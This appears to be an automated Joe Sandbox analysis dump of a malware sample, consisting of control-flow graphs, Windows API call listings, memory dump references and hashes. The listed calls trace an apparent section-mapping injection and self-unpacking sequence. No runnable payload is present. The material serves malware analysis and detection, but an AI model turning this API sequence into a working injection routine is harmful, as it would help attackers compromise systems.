                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                        • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                        • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                        • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 336 401658-401670 call 4012a9 340 401672 336->340 341 401675-40167a 336->341 340->341 343 401680-401691 341->343 344 401991-401999 341->344 347 401697-4016c0 343->347 348 40198f 343->348 344->341 349 40199e-4019e0 call 4012a9 344->349 347->348 357 4016c6-4016dd NtDuplicateObject 347->357 348->349 357->348 358 4016e3-401707 NtCreateSection 357->358 361 401763-401789 NtCreateSection 358->361 362 401709-40172a NtMapViewOfSection 358->362 361->348 363 40178f-401793 361->363 362->361 365 40172c-401748 NtMapViewOfSection 362->365 363->348 366 401799-4017ba NtMapViewOfSection 363->366 365->361 368 40174a-401760 365->368 366->348 369 4017c0-4017dc NtMapViewOfSection 366->369 368->361 369->348 371 4017e2 call 4017e7 369->371
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                        • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                        • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                        • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 375 30225b2-30225cb 376 30225cd-30225cf 375->376 377 30225d1 376->377 378 30225d6-30225e2 CreateToolhelp32Snapshot 376->378 377->378 379 30225f2-30225ff Module32First 378->379 380 30225e4-30225ea 378->380 381 3022601-3022602 call 3022271 379->381 382 3022608-3022610 379->382 380->379 385 30225ec-30225f0 380->385 386 3022607 381->386 385->376 385->379 386->382
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 030225DA
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 030225FA
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0301B000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_301b000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: a7fcb4115a01bc6dd16579a430e37e8a6d8a79b8a5add302e505addf6ec0148c
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 93F0F6365023306FD7A07BF8A88CB6EBAECBF49220F140929E643D14C0DBB0E8458761

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 2e1003c-2e10047 1 2e10049 0->1 2 2e1004c-2e10263 call 2e10a3f call 2e10e0f call 2e10d90 VirtualAlloc 0->2 1->2 17 2e10265-2e10289 call 2e10a69 2->17 18 2e1028b-2e10292 2->18 23 2e102ce-2e103c2 VirtualProtect call 2e10cce call 2e10ce7 17->23 20 2e102a1-2e102b0 18->20 22 2e102b2-2e102cc 20->22 20->23 22->20 29 2e103d1-2e103e0 23->29 30 2e103e2-2e10437 call 2e10ce7 29->30 31 2e10439-2e104b8 VirtualFree 29->31 30->29 33 2e105f4-2e105fe 31->33 34 2e104be-2e104cd 31->34 37 2e10604-2e1060d 33->37 38 2e1077f-2e10789 33->38 36 2e104d3-2e104dd 34->36 36->33 40 2e104e3-2e10505 36->40 37->38 43 2e10613-2e10637 37->43 41 2e107a6-2e107b0 38->41 42 2e1078b-2e107a3 38->42 51 2e10517-2e10520 40->51 52 2e10507-2e10515 40->52 44 2e107b6-2e107cb 41->44 45 2e1086e-2e108be LoadLibraryA 41->45 42->41 46 2e1063e-2e10648 43->46 48 2e107d2-2e107d5 44->48 50 2e108c7-2e108f9 45->50 46->38 49 2e1064e-2e1065a 46->49 53 2e10824-2e10833 48->53 54 2e107d7-2e107e0 48->54 49->38 55 2e10660-2e1066a 49->55 57 2e10902-2e1091d 50->57 58 2e108fb-2e10901 50->58 59 2e10526-2e10547 51->59 52->59 56 2e10839-2e1083c 53->56 60 2e107e2 54->60 61 2e107e4-2e10822 54->61 62 2e1067a-2e10689 55->62 56->45 63 2e1083e-2e10847 56->63 58->57 66 2e1054d-2e10550 59->66 60->53 61->48 64 2e10750-2e1077a 62->64 65 2e1068f-2e106b2 62->65 67 2e10849 63->67 68 2e1084b-2e1086c 63->68 64->46 69 2e106b4-2e106ed 65->69 70 2e106ef-2e106fc 65->70 72 2e105e0-2e105ef 66->72 73 2e10556-2e1056b 66->73 67->45 68->56 69->70 74 2e1074b 70->74 75 2e106fe-2e10748 70->75 72->36 76 2e1056d 73->76 77 2e1056f-2e1057a 73->77 74->62 75->74 76->72 78 2e1059b-2e105bb 77->78 79 2e1057c-2e10599 77->79 84 2e105bd-2e105db 78->84 79->84 84->66
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E1024D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2e10000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: 05d9d281a1c433bce65ea9a5464aedae69b2998bd44d145af81311050d83877e
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: 7E526974A01229DFDB64CF58C984BACBBB1BF09314F1480E9E94DAB351DB30AA85CF14

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 388 2e10e0f-2e10e24 SetErrorMode * 2 389 2e10e26 388->389 390 2e10e2b-2e10e2c 388->390 389->390
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02E10223,?,?), ref: 02E10E19
                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02E10223,?,?), ref: 02E10E1E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2e10000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: 8542446d127bdfb01e3c0bf921da1d9e01cee5e862faad54c88cd0ae9bd8b7d4
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: A4D0123114512877DB002A95DC09BCD7B1CDF05B66F008021FB0DD9080C770954046E5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 391 401a01-401a48 call 4012a9 Sleep call 401524 401 401a57-401aa7 call 4012a9 391->401 402 401a4a-401a52 call 401615 391->402 402->401
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                        • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                        • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                        • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 416 4019e3-401a48 call 4012a9 Sleep call 401524 431 401a57-401aa7 call 4012a9 416->431 432 401a4a-401a52 call 401615 416->432 432->431
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                        • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                        • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                        • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 446 4019ee-401a48 call 4012a9 Sleep call 401524 459 401a57-401aa7 call 4012a9 446->459 460 401a4a-401a52 call 401615 446->460 460->459
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                        • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                        • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                        • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 474 4019fa-401a48 call 4012a9 Sleep call 401524 489 401a57-401aa7 call 4012a9 474->489 490 401a4a-401a52 call 401615 474->490 490->489
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                        • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                        • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                        • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 504 401a09-401a48 call 4012a9 Sleep call 401524 513 401a57-401aa7 call 4012a9 504->513 514 401a4a-401a52 call 401615 504->514 514->513
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                        • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                        • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                        • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 030222C2
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0301B000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_301b000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: 2d17545c7480c741774bf8625893c765457f27f6e210bbdcc533168e934df9f4
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: AA112D79A00208EFDB01DF98C985E98BFF5AF08350F058094F9489B361D771EA50DB80

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 528 401a10-401a48 call 4012a9 Sleep call 401524 534 401a57-401aa7 call 4012a9 528->534 535 401a4a-401a52 call 401615 528->535 535->534
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                        • String ID:
                                                        • API String ID: 4152845823-0
                                                        • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                        • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                        • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                        • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2e10000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$GetProcAddress.$l
                                                        • API String ID: 0-2784972518
                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction ID: 2ed047629777728eeaeb637f375ef117cc3e645655fbc360e6dbe5639cec981f
                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction Fuzzy Hash: C4314BB6900609DFDB10CF99C880AADBBF5FF48328F14905AD841A7214D771EA85CFA4
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72d4be65fd5c4aadfe3181895be588e99445a0ecc216837a8ab9eea584e428f3
                                                        • Instruction ID: 69ca2c5ad779ff779106a882f61feb38b2f88a99de665ab11ce56d99059bcabb
                                                        • Opcode Fuzzy Hash: 72d4be65fd5c4aadfe3181895be588e99445a0ecc216837a8ab9eea584e428f3
                                                        • Instruction Fuzzy Hash: 0751CDA190D6D15FE7138E3448C53D9BF29EE13B0170904AFD5C26F693D23CAA07838A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2bb28b499498aeea13836d83123d56415545c74703dd59ede85a111e02f7c13
                                                        • Instruction ID: aad523fcd350dd7e48cf14232ffa1e008521eb722179f4d6a6caafb65ea2e327
                                                        • Opcode Fuzzy Hash: b2bb28b499498aeea13836d83123d56415545c74703dd59ede85a111e02f7c13
                                                        • Instruction Fuzzy Hash: 001102B0A1C5D19ADB1B1E3004E4665BF2CAA53B5372D00BBD9827E5C2D63C6F06924F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c7ece749f6430daf655d98b633fe13b947581eedef0c6cbbe75591b9315e754
                                                        • Instruction ID: 352e8d253fa7b3b8dd7957dd3af29bc2fa359aa34c2ce5570c2a01e88b37b8e5
                                                        • Opcode Fuzzy Hash: 6c7ece749f6430daf655d98b633fe13b947581eedef0c6cbbe75591b9315e754
                                                        • Instruction Fuzzy Hash: C411BEB1A0C5D15BEB171E3044A46A6BF2CAA53B5375D00BBE9827E6C2D13C6B06924F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3bf7d49b2119c85336353d75583e2e826d4b6bf710ddbd45acbf88bbcfb002c7
                                                        • Instruction ID: c4c69dfa6a93bac5686c789e4b09db5a6b9e324f66b4c550809259961904fcdf
                                                        • Opcode Fuzzy Hash: 3bf7d49b2119c85336353d75583e2e826d4b6bf710ddbd45acbf88bbcfb002c7
                                                        • Instruction Fuzzy Hash: E411EFB0A0C5D15AEB172E3444946A6BF28AE53B5775D00BBD5C27E6C2D13C2F06924E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e438e8d2e72f34d8578db350d93a7b9ff8eb5d6d5bbd12f8c265cb93a87fcc14
                                                        • Instruction ID: 99727d9d7cf374fe44c7d6d00e329f0fe83cdbd758af6568a24e55acb90e5523
                                                        • Opcode Fuzzy Hash: e438e8d2e72f34d8578db350d93a7b9ff8eb5d6d5bbd12f8c265cb93a87fcc14
                                                        • Instruction Fuzzy Hash: CD11EFB1A0C5D25AEB172E3044946A6BF2CAE53B5375D01BBD5C27E5C3D13C2F06824E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0301B000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_301b000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction ID: 9408a3756edbddf5fab31185f2123518f708a4257d10e059e155b478bf975967
                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction Fuzzy Hash: 17118E72341210AFDB48DF55DC80FA677EAFB88260B198065ED08CB716E676E802C760
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1629470404.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_400000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbca18c3eeb6f43da73f1299d217a7617a34a672b16bfca3773c378893150fbe
                                                        • Instruction ID: 29b0ddcd1d63681b27311a16ac10645ed1be97e2cd38ed92f7145ca68817f7f8
                                                        • Opcode Fuzzy Hash: dbca18c3eeb6f43da73f1299d217a7617a34a672b16bfca3773c378893150fbe
                                                        • Instruction Fuzzy Hash: 5B012EA090C6C01AEB276F3440A829ABF28AE43B53B0D00FBD5D42E5C3D23C2E04C24E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2e10000_PZ3hKWPffUrXuh6Gjn77Ivv1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction ID: 69aaf218601d9cf0a3ffaa6dce79e4c50cf731f120afa72f8221988e4c5b3f21
                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction Fuzzy Hash: B901A276B506048FDF21CF24C805BAE33E5FB8631AF4594B5DD0A97285E774A9818B90

                                                        Execution Graph

                                                        Execution Coverage:14.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:2.2%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:45
                                                        execution_graph 13092 411160 13095 413f9f 13092->13095 13096 411166 13095->13096 13097 413fcd 13095->13097 13098 414012 13097->13098 13099 413fd7 13097->13099 13100 414003 13098->13100 13103 41570a ctype 28 API calls 13098->13103 13112 41570a 13099->13112 13100->13096 13102 41406b RtlFreeHeap 13100->13102 13102->13096 13107 41401e ctype 13103->13107 13104 413fde ctype 13105 413ff8 13104->13105 13127 415ac8 13104->13127 13133 414009 13105->13133 13111 41404a 13107->13111 13136 41684f 13107->13136 13140 414061 13111->13140 13113 415760 EnterCriticalSection 13112->13113 13114 415722 13112->13114 13113->13104 13143 413e65 13114->13143 13117 415738 13119 41570a ctype 27 API calls 13117->13119 13120 415740 13119->13120 13121 415751 13120->13121 13122 415747 InitializeCriticalSection 13120->13122 13124 413f9f ctype 27 API calls 13121->13124 13123 415756 13122->13123 13152 41576b LeaveCriticalSection 13123->13152 13124->13123 13126 41575e 13126->13113 13128 415b06 13127->13128 13132 415dbc ctype 13127->13132 13129 415d02 VirtualFree 13128->13129 13128->13132 13130 415d66 13129->13130 13131 415d75 VirtualFree HeapFree 13130->13131 13130->13132 13131->13132 13132->13105 13236 41576b LeaveCriticalSection 13133->13236 13135 414010 13135->13100 13137 41687c 13136->13137 13139 416892 13136->13139 13137->13139 13237 416736 13137->13237 13139->13111 